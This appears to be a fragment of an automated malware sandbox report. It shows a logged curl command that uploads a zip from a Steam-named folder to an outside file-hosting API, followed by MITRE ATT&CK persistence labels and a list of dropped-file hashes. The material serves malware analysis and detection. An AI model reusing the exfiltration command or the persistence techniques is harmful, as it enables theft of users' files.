C:\Windows\system32\curl.execurl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Erhqjvyq.zip";3⤵PID:4212
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5fc9699e6680f11a2b09f0172330417de
SHA160cdcc10acd76ca911edd780213da31df23ff127
SHA256d518683c62c8979986bb33d696212081308461211bcfe491a498f15708acde77
SHA512bc50bbaa9a1f554f61086c57329ca566df915b05362d91c491a9857ab5df0405d46e42ced26eef760da9bda10ec2a22ecff5e325db88788ef6733d763f72f257
-
Filesize
94B
MD52f308e49fe62fbc51aa7a9b987a630fe
SHA11b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024
-
Filesize
70B
MD58a0ed121ee275936bf62b33f840db290
SHA1898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA5127d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154
-
Filesize
15B
MD5675951f6d9d75fd2c9c06b5ff547c6fd
SHA19b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA25660fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA51244dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea
-
Filesize
78B
MD5c5e74f3120dbbd446a527e785dfe6d66
SHA111997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f
-
Filesize
511B
MD5fadd2fdbf159718abc1dfb4744347de0
SHA13a593b4feb5ae15364105f25a6702cafe198832b
SHA2569b29a49083ddc87c2d27c50970d5812709f19bba657ee105c29c04fb7f952b5a
SHA5127a79ddb56f61033e73ecf9c360cc37e87fb1e5a319758fb8e720ef3188e544a20e131f290c16dde9ec20f0638fd76622d4c190e84fb1071c5a802888a0f16956
-
Filesize
1KB
MD5458a02acc38af54e1add12fed5399ed1
SHA1f0e545341f6ff5e80044b618c2a5fe67f8170b4a
SHA256913fd4f632fd15df036dfa0a78a224478aca3cf719c787108c01ddef9f48ca95
SHA51248b8bf34ec7174d963e0c22714ce452c742e25c202a901d195746bdcd6674760dc3aad3408ab5433ca8f1c36ed5195a185c964518b0ef1f0eb4d961e934b45c4
-
Filesize
1KB
MD51009e1046ce0b005db5e9a3ce4a1220d
SHA15c23f05a5bd9a101553b7e06411b7e3d355dbe30
SHA25619f8294e8743095c97a8dbc71e344f4f6f823766b5845d310b501783313907ca
SHA512c1e1b571138c18abd72507d923c854a8ee3b5a71a2dd0e57af39d426dbe160bd880aa6deb800490bd3e28fb8b9b582c5dfc46390e0d2c943ce515da587dadc66
-
Filesize
1.4MB
MD59da1950f679ec55c81274e088add9b95
SHA15d189c9d0f95039914b7abe9195f2d52f459a54a
SHA256c58cbd5639c41bee44997d9299a4c23a352f2ec3686d228489359f15887a6e59
SHA5124a72e7224938941fa02e3632a7849260386b3e52049ba296654306f6fe715d7dc1b7daad95a6cee8d9c84901dae3f483c79e54ce2336cb132d5d2ba93bd6f458
-
Filesize
1KB
MD59d935264fe5b75cab75996a939092036
SHA1c7e8e9fb6e953dd208860a94b1f66096bb623307
SHA256bf7e8088d7ae986238fd97707596a30cf23daf03dca8278ea02e9ea5a1b8fcae
SHA512ececb6d2ba1cd22623fca9035c6ab769765b59a7b3c1aab2b1835e2265ec59b7a8aa362e2cd9c22ff7c14274d495cc3acb813c8b136891fedcddfc3d4b7aae35
-
Filesize
3KB
MD5a8834c224450d76421d8e4a34b08691f
SHA173ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596
-
Filesize
146B
MD514a9867ec0265ebf974e440fcd67d837
SHA1ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA51236c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54
-
Filesize
3KB
MD53f01549ee3e4c18244797530b588dad9
SHA13e87863fc06995fe4b741357c68931221d6cc0b9
SHA25636b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
SHA51273843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50
-
Filesize
1KB
MD5e86a2f4d6dec82df96431112380a87e6
SHA12dc61fae82770528bee4fe5733a8ac3396012e79
SHA256dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a
SHA5125f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5
-
Filesize
1KB
MD5bf5c5af87e23d85a8ffd526c59f55565
SHA155e97898ea968153fb9bd5865ccadc2a9b73250f
SHA256a08522ec7efe1ff36a01ab8f20291af0a8f96bdd3f2bf5d442f48adb156e9392
SHA512a19256c11ffae36ca6deae67aebc17f5796c67a55ddeaa3c6e8f61d42cacac0e1ad858d7993c67e01fea469ab81e4d1ba20b8a7653ed48f020ba887e996f117d
-
Filesize
944B
MD545e855caf6416c7421aefa10280b7f6e
SHA136b9fe269a55d8f066b455fa5b236dc82f498ecf
SHA256a38df3afff20b6433022d62ff3119144b5eae29e930bf448bae09c24e30b47db
SHA512ab1baa0fc67d74fe8909974a03e8863003cd3e1695cb6fd7ea5033ccc762b76888001d8792ee9daf55a325157d3d3056a0325cd758182aff0e024cd54257c098
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
64B
MD5843236648c17e7b11d720f5613760d8a
SHA13817030c1334fee32e1c0e6ad08e9cc1392fbedb
SHA256309c24cd0ff95d7ceb33d58b206fe5d1d31fedadaa36d6e71e2afd444184ea0d
SHA512e2dbc0bba9dada38be74f7a1d4d4aac5ee60eaa78114643f02883973adfc45b7555cf580d70b541c8ee1626242c2ee61469577c0a17f13d0cd0303d402a8b3aa
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
2KB
MD5e262e86ecae4ccaeaaa3f7e9f579a957
SHA1eb8dad9db8cdff76641d7ce323f0bdf9f2d6602f
SHA256cc2bcad35e8c8fff3ac293ff05e77658c781934c951dce3f8d0675c324b7ea00
SHA5126d62402a07b4bdae548c83c14a0ac5790f5262b896794793897a22b4d5bc5a4a5f972f5b762ec94a9f16e81f064c5b16ad7f2b4a48d9010d318ec32548182a86
-
Filesize
1KB
MD511fd28d39df47d7b533063b97bb9d171
SHA125dd84099d487ad2a56d00f21a58b985be5f255b
SHA25653fea24930b0eaf921eb9d621f121460ff542e8f2caa8a2d50c9457f86f592fa
SHA512d57b50d5bb3b3b2f552b313117ad4981c55ad7237e2531586557a05ffbf08bd5aebcc5de67dbd7e16998df705c9e6bdb18231ad2b95e8b4132495fe28d1ee425
-
Filesize
1KB
MD5505b65c154ac2ebde9f01228e1ad7a14
SHA1ba2ccbd453cc88e54e8ad1cee93811e3aaf0b832
SHA256bf77d41a1fc123ab30c1d9364fa2a620fd5f7745b1f3ca398e57c430d934709f
SHA51227f153af5782ac6422a1e1dba8b335b724ecf57d79d8427320decb96f408edaebec759370fd47809d32374d562c71c425f76d85197e51599a275fb97476ce960
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD555efe218d25f812659b911921a5ee587
SHA1f38ee0e17d1ceda5d0dd966343a23c63fbd0a384
SHA2564be41e2346813b683296ef673cad7195ce83713c630e1d427bc5fa22c4fbdd30
SHA5121914232993725bd61ee5bc558031cad6b8e25c684146039b19a1b99bad5bdc890dd415c9be2d2ede37b2c3fb99b853adc67eea0c89d09fdaed4e2ce7166dc5f1
-
Filesize
1.4MB
MD57d0fd8935995768be097070d3fd0e664
SHA18d640d0d0b2500f1cd67aa34eb8d2025fe33888b
SHA2562bea76129bd83facb5032b97712b9a9bb04501917590c50dd6907a12cd3c0cc1
SHA51282679dd92db3ef01c92a6469fa67ba27c518680cf28077bc80c958a44515f49f197bac00faa35f581a77632617352b6ab835e1bf4caeb353e14062d7857c06fb
-
Filesize
3KB
MD52e3a163ddfbaa533e0be56122b61e7a4
SHA12d86febbd74f6d0094c979288ea95436bf921fe9
SHA25671a8977f2d3bd102cfb1fece03068b841aad21e582e08034fe89de406cbfb70f
SHA51238a4751c87a478b1358f97e2d63a56be1ed70e2a495ef8ea108bbb4826ca70f7168e6aee43e6d526c241ca8cfa0c7cb8e8442d565dfb0fed5e61f118fb4ecbc9
-
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
Filesize1.8MB
MD566a65322c9d362a23cf3d3f7735d5430
SHA1ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA5120a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21
-
Filesize
379B
MD518047e197c6820559730d01035b2955a
SHA1277179be54bba04c0863aebd496f53b129d47464
SHA256348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA5121942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877
-
Filesize
652B
MD5c37d250d73e1b696e066b69e81791f54
SHA19fecdcf7756e78e82c9345e33b20d9cb21b5b09d
SHA2568e647f80ee96cf92af3808d6a56852971311f1ce2b1a8436e3512a0d9a467fd3
SHA5127528801e75aa82bbfc6c077b956c24a6fc804c9d57280c86270da2b7f40fb615a54b2eb7439e2e066cafe9012b05caf7bf59d94cfc3798e8b2aa9a199e3cd058
-
Filesize
426B
MD5b462a7b0998b386a2047c941506f7c1b
SHA161e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020
-
Filesize
369B
MD5660ada5e65fe19c70a7a5513fa638c44
SHA1f1ab4b0810e67da19e8b28e5f3dc728fb1dc5c37
SHA25623aea826c410f5af6563fb1130326b4edbe30a4e1bfbb88827eed641598edad3
SHA512353e7d10f4f94232740359d0d6f504905ca23eaa1d0bc516963e6e56d72c3efadde3608bf795b47c2cfc006adb1591e923d3cc01ec40d614ba56bc01869e12fc
-
Filesize
652B
MD53a414e82795eb06a48dfaf287ba73592
SHA11c7990102dd4956452b2f6ce9afe235f10c401a1
SHA256f349b77908f97964db05f84a2cb401b66bdecdf4462473e7b014de7de2ff3de2
SHA5128be933d8e09c936f4d66baefc3b34706ca8f6ddc8a472e7ead0d2ab08093970049be2886b2544b38e3ae306333eac23fa31f0bdbb6c033e1f83eaaf83873cb9b
-
Filesize
311B
MD57bc8de6ac8041186ed68c07205656943
SHA1673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA25636865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA5120495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba
-
Filesize
369B
MD56289db9e12bfc207e2e6505eb942700f
SHA1a002c25a79a7ab57932c02bd0aa9dc6c12d5868f
SHA25664242687117ca3a4426d8877fd479467d7eca329694bc6e8bcf0fa9b1e476712
SHA5123c065d47f994e16dfc276bd5ecf8325e25a1298c8b967e1525260c66e8e6d93d7b0ac5657283e28c74483e09aa91e9dd5ac425a9be58a205b4531501fd4856f0